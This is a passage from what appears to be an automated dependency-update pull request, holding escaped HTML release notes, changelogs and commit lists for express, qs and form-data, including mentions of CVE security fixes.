href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6909\"\u003eexpressjs/express#6909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6919\"\u003eexpressjs/express#6919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.22.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6921\"\u003eexpressjs/express#6921\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.2...4.22.0\"\u003ehttps://github.com/expressjs/express/compare/4.21.2...4.22.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd funding field (v4) by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6065\"\u003eexpressjs/express#6065\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11 by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5956\"\u003eexpressjs/express#5956\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: bump path-to-regexp@0.1.12 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6209\"\u003eexpressjs/express#6209\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.2 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6094\"\u003eexpressjs/express#6094\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.1...4.21.2\"\u003ehttps://github.com/expressjs/express/compare/4.21.1...4.21.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBackport a fix for CVE-2024-47764 to the 4.x branch by \u003ca href=\"https://github.com/joshbuker\"\u003e\u003ccode\u003e@​joshbuker\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6029\"\u003eexpressjs/express#6029\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6031\"\u003eexpressjs/express#6031\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.0...4.21.1\"\u003ehttps://github.com/expressjs/express/compare/4.21.0...4.21.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/blob/v4.22.1/History.md\"\u003eexpress's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.22.1 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRevert security fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.0 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.2 / 2024-11-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.12\n\u003cul\u003e\n\u003cli\u003eFix backtracking protection\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11\n\u003cul\u003e\n\u003cli\u003eThrows an error on invalid path values\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.1 / 2024-10-08\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported a fix for \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-47764\"\u003eCVE-2024-47764\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.0 / 2024-09-11\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eres.location(\u0026quot;back\u0026quot;)\u003c/code\u003e and \u003ccode\u003eres.redirect(\u0026quot;back\u0026quot;)\u003c/code\u003e magic string\u003c/li\u003e\n\u003cli\u003edeps: serve-static@1.16.2\n\u003cul\u003e\n\u003cli\u003eincludes send@0.19.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: finalhandler@1.3.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.20.0 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: serve-static@0.16.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: send@0.19.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: body-parser@0.6.0\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRemove link renderization in html while using \u003ccode\u003eres.redirect\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.10\n\u003cul\u003e\n\u003cli\u003eAdds support for named matching groups in the routes using a regex\u003c/li\u003e\n\u003cli\u003eAdds backtracking protection to parameters without regexes defined\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: encodeurl@~2.0.0\n\u003cul\u003e\n\u003cli\u003eRemoves encoding of \u003ccode\u003e\\\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, and \u003ccode\u003e^\u003c/code\u003e to align better with URL spec\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eDeprecate passing \u003ccode\u003eoptions.maxAge\u003c/code\u003e and \u003ccode\u003eoptions.expires\u003c/code\u003e to \u003ccode\u003eres.clearCookie\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/12fae14531a78f19a2caaa5d4f58d9b01eaf3194\"\u003e\u003ccode\u003e12fae14\u003c/code\u003e\u003c/a\u003e 4.22.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/5ddf311af32e772a77fd48b6266ce2f1ba330e1a\"\u003e\u003ccode\u003e5ddf311\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;sec: security patch for CVE-2024-51999\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/49744abd1120484fe64d7bde1cd3197c32523b6e\"\u003e\u003ccode\u003e49744ab\u003c/code\u003e\u003c/a\u003e 4.22.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6e97452f600a3b01719fbc5517d833c7646b0bb7\"\u003e\u003ccode\u003e6e97452\u003c/code\u003e\u003c/a\u003e sec: security patch for CVE-2024-51999\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6a23d34d652b9e69a4486d2a2a0dea54b9685fa5\"\u003e\u003ccode\u003e6a23d34\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6919\"\u003e#6919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/8c12cdf93b89a4628b59179e3cc0722fc517d6b3\"\u003e\u003ccode\u003e8c12cdf\u003c/code\u003e\u003c/a\u003e deps: qs@6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6909\"\u003e#6909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/7fea74fcf02764580f38f2a7f1932dfa54cddd90\"\u003e\u003ccode\u003e7fea74f\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6905\"\u003e#6905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/dac7a0475a99e9dfc57b3b8e6d5bdf52813f1944\"\u003e\u003ccode\u003edac7a04\u003c/code\u003e\u003c/a\u003e chore: wider range for query test skip (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6513\"\u003e#6513\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/997919b48879bbd53171c3b4e5dd1b04ad139241\"\u003e\u003ccode\u003e997919b\u003c/code\u003e\u003c/a\u003e ci: add node.js 24 to test matrix (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6506\"\u003e#6506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/36fb59c6c7d9dfca0b08dfeafb5b6e4a249234a1\"\u003e\u003ccode\u003e36fb59c\u003c/code\u003e\u003c/a\u003e fix(ci): reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6336\"\u003e#6336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/express/compare/4.18.2...v4.22.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for express since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.1 to 6.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003ethrowOnParameterLimitExceeded\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/517\"\u003e#517\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: use \u003ccode\u003eutils.combine\u003c/code\u003e more\u003c/li\u003e\n\u003cli\u003e[patch] \u003ccode\u003eparse\u003c/code\u003e: add explicit \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e default\u003c/li\u003e\n\u003cli\u003e[actions] use shared action; re-add finishers\u003c/li\u003e\n\u003cli\u003e[meta] Fix changelog formatting bug\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003ehas-bigints\u003c/code\u003e, \u003ccode\u003ehas-proto\u003c/code\u003e, \u003ccode\u003ehas-symbols\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.3\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e[Fix] fix regressions from robustness refactor\n[actions] update reusable workflows\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: avoid a crash when a \u003ccode\u003efilter\u003c/code\u003e key is \u003ccode\u003enull\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eutils.merge\u003c/code\u003e: functions should not be stringified into keys\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: avoid a crash with interpretNumericEntities: true, comma: true, and iso charset\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: ensure a non-string \u003ccode\u003efilter\u003c/code\u003e does not crash\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003e__proto__\u003c/code\u003e syntax instead of \u003ccode\u003eObject.create\u003c/code\u003e for null objects\u003c/li\u003e\n\u003cli\u003e[Refactor] misc cleanup\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/bdcf0c7f82387c18ac8fabfccd2f440645cef47b\"\u003e\u003ccode\u003ebdcf0c7\u003c/code\u003e\u003c/a\u003e v6.14.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/294db90c812ddbe7d7a35d5687c505fd21a2d6a2\"\u003e\u003ccode\u003e294db90\u003c/code\u003e\u003c/a\u003e [readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5c308e5516c270a78caa6f278465914090f91ec6\"\u003e\u003ccode\u003e5c308e5\u003c/code\u003e\u003c/a\u003e [readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/6addf8cf738d529c54d91f6f3ffb6c1be91bbfdc\"\u003e\u003ccode\u003e6addf8c\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/cfc108f662326d6ab540f3545ef0b832baf83cdf\"\u003e\u003ccode\u003ecfc108f\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/`pars...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/febb64442a80e49200211fa38d3c96b58024ac77\"\u003e\u003ccode\u003efebb644\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when `thr...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482\"\u003e\u003ccode\u003ef6a7abf\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/fbc5206c25b4d1851cea683f02c10756c521d15a\"\u003e\u003ccode\u003efbc5206\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/1b9a8b4e78c6aff4c22fa559107227f02fd0216a\"\u003e\u003ccode\u003e1b9a8b4\u003c/code\u003e\u003c/a\u003e [actions] fix rebase workflow permissions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/2a35775614e0fb46ac8a3060201a32a7c23a7fda\"\u003e\u003ccode\u003e2a35775\u003c/code\u003e\u003c/a\u003e [meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.1...v6.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.0 to 4.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca 